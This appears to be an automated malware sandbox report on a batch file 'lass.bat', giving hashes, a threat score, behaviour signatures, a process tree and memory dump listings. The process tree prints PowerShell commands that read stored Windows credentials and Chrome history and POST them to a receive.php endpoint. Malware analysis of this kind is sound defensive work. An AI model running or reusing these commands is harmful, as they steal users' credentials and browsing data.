001963387c6237e750cc8af0d3a1c50175c0b31661650ee6c38a715d1086ec00

General

Target

lass.bat
Size

2KB
MD5

98b3b2ad7becd3d4a0395f566c4c8e2d
SHA1

063f55768afd8fa7625ea3868f96d3e0276b046b
SHA256

001963387c6237e750cc8af0d3a1c50175c0b31661650ee6c38a715d1086ec00
SHA512

dcd80c59f94e4681725f40def6fa769ed999241419a1a1ae186e9ab9ec5d90fd4092ecad54f14c9cc2a071371003888ec7a9fd67e01af9219df7fdaa4279578f

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2096	powershell.exe
2668	powershell.exe
2568	powershell.exe
3004	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2096	powershell.exe
Token: SeDebugPrivilege	2668	powershell.exe
Token: SeDebugPrivilege	2568	powershell.exe
Token: SeDebugPrivilege	3004	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1936 wrote to memory of 2496	1936	cmd.exe	29
PID 1936 wrote to memory of 2496	1936	cmd.exe	29
PID 1936 wrote to memory of 2496	1936	cmd.exe	29
PID 1936 wrote to memory of 2096	1936	cmd.exe	30
PID 1936 wrote to memory of 2096	1936	cmd.exe	30
PID 1936 wrote to memory of 2096	1936	cmd.exe	30
PID 1936 wrote to memory of 2668	1936	cmd.exe	31
PID 1936 wrote to memory of 2668	1936	cmd.exe	31
PID 1936 wrote to memory of 2668	1936	cmd.exe	31
PID 1936 wrote to memory of 2568	1936	cmd.exe	32
PID 1936 wrote to memory of 2568	1936	cmd.exe	32
PID 1936 wrote to memory of 2568	1936	cmd.exe	32
PID 1936 wrote to memory of 3004	1936	cmd.exe	33
PID 1936 wrote to memory of 3004	1936	cmd.exe	33
PID 1936 wrote to memory of 3004	1936	cmd.exe	33

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\lass.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1936
- C:\Windows\system32\mode.com
  mode con cols=800 lines=100
  2⤵
  PID:2496
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Get-Content $env:APPDATA\Microsoft\Credentials\*.CREDENTIAL | ForEach-Object { $_ | ConvertTo-Json }"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2096
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Get-Content $env:APPDATA\..\Local\Google\Chrome\User Data\Default\History | ForEach-Object { $_ | ConvertTo-Json }"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2668
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Invoke-RestMethod -Uri 'http://192.168.0.1/receive.php' -Method POST -InFile 'passwords.txt'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Invoke-RestMethod -Uri 'http://192.168.0.1/receive.php' -Method POST -InFile 'history.txt'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3004

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
3afaaabe3237a983458ea710df9aa57a

SHA1
203ec113d09681a5e2cf82bf93cff084e718a17e

SHA256
c1545875daf2560bf8405c2ea63a5f4525fc18511c36d1a9fd36503812bf7a3a

SHA512
d4834b1c560a1649b728cc23d7dcc540cb90080611e44fb62ca15af9732be02e6834deab7e7a9e240c1eaae91bb3cec93c82dce6929e27cd730d5d2d8791ad15

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
3afaaabe3237a983458ea710df9aa57a

SHA1
203ec113d09681a5e2cf82bf93cff084e718a17e

SHA256
c1545875daf2560bf8405c2ea63a5f4525fc18511c36d1a9fd36503812bf7a3a

SHA512
d4834b1c560a1649b728cc23d7dcc540cb90080611e44fb62ca15af9732be02e6834deab7e7a9e240c1eaae91bb3cec93c82dce6929e27cd730d5d2d8791ad15

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
3afaaabe3237a983458ea710df9aa57a

SHA1
203ec113d09681a5e2cf82bf93cff084e718a17e

SHA256
c1545875daf2560bf8405c2ea63a5f4525fc18511c36d1a9fd36503812bf7a3a

SHA512
d4834b1c560a1649b728cc23d7dcc540cb90080611e44fb62ca15af9732be02e6834deab7e7a9e240c1eaae91bb3cec93c82dce6929e27cd730d5d2d8791ad15

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U3FCA5ZZVKPY6YCV66PD.temp

Filesize
7KB

MD5
3afaaabe3237a983458ea710df9aa57a

SHA1
203ec113d09681a5e2cf82bf93cff084e718a17e

SHA256
c1545875daf2560bf8405c2ea63a5f4525fc18511c36d1a9fd36503812bf7a3a

SHA512
d4834b1c560a1649b728cc23d7dcc540cb90080611e44fb62ca15af9732be02e6834deab7e7a9e240c1eaae91bb3cec93c82dce6929e27cd730d5d2d8791ad15

Download Submit
memory/2096-4-0x000000001B260000-0x000000001B542000-memory.dmp

Filesize
2.9MB

Download
memory/2096-9-0x0000000002500000-0x0000000002580000-memory.dmp

Filesize
512KB

Download
memory/2096-8-0x0000000002504000-0x0000000002507000-memory.dmp

Filesize
12KB

Download
memory/2096-6-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

Filesize
9.6MB

Download
memory/2096-5-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/2096-47-0x0000000002500000-0x0000000002580000-memory.dmp

Filesize
512KB

Download
memory/2096-7-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

Filesize
9.6MB

Download
memory/2568-37-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

Filesize
9.6MB

Download
memory/2568-36-0x00000000026B0000-0x0000000002730000-memory.dmp

Filesize
512KB

Download
memory/2568-35-0x00000000026B0000-0x0000000002730000-memory.dmp

Filesize
512KB

Download
memory/2568-33-0x00000000026B0000-0x0000000002730000-memory.dmp

Filesize
512KB

Download
memory/2568-34-0x00000000026B0000-0x0000000002730000-memory.dmp

Filesize
512KB

Download
memory/2568-32-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

Filesize
9.6MB

Download
memory/2568-31-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

Filesize
9.6MB

Download
memory/2668-17-0x000007FEF4FF0000-0x000007FEF598D000-memory.dmp

Filesize
9.6MB

Download
memory/2668-18-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download
memory/2668-23-0x0000000002970000-0x00000000029F0000-memory.dmp

Filesize
512KB

Download
memory/2668-22-0x0000000002970000-0x00000000029F0000-memory.dmp

Filesize
512KB

Download
memory/2668-19-0x000007FEF4FF0000-0x000007FEF598D000-memory.dmp

Filesize
9.6MB

Download
memory/2668-20-0x0000000002970000-0x00000000029F0000-memory.dmp

Filesize
512KB

Download
memory/2668-21-0x0000000002970000-0x00000000029F0000-memory.dmp

Filesize
512KB

Download
memory/2668-24-0x000007FEF4FF0000-0x000007FEF598D000-memory.dmp

Filesize
9.6MB

Download
memory/2668-16-0x000000001B340000-0x000000001B622000-memory.dmp

Filesize
2.9MB

Download
memory/3004-44-0x000007FEF4FF0000-0x000007FEF598D000-memory.dmp

Filesize
9.6MB

Download
memory/3004-46-0x0000000001FC0000-0x0000000002040000-memory.dmp

Filesize
512KB

Download
memory/3004-45-0x0000000001FC0000-0x0000000002040000-memory.dmp

Filesize
512KB

Download
memory/3004-43-0x000007FEF4FF0000-0x000007FEF598D000-memory.dmp

Filesize
9.6MB

Download
memory/3004-49-0x0000000001FC0000-0x0000000002040000-memory.dmp

Filesize
512KB

Download
memory/3004-48-0x0000000001FC0000-0x0000000002040000-memory.dmp

Filesize
512KB

Download
memory/3004-50-0x000007FEF4FF0000-0x000007FEF598D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads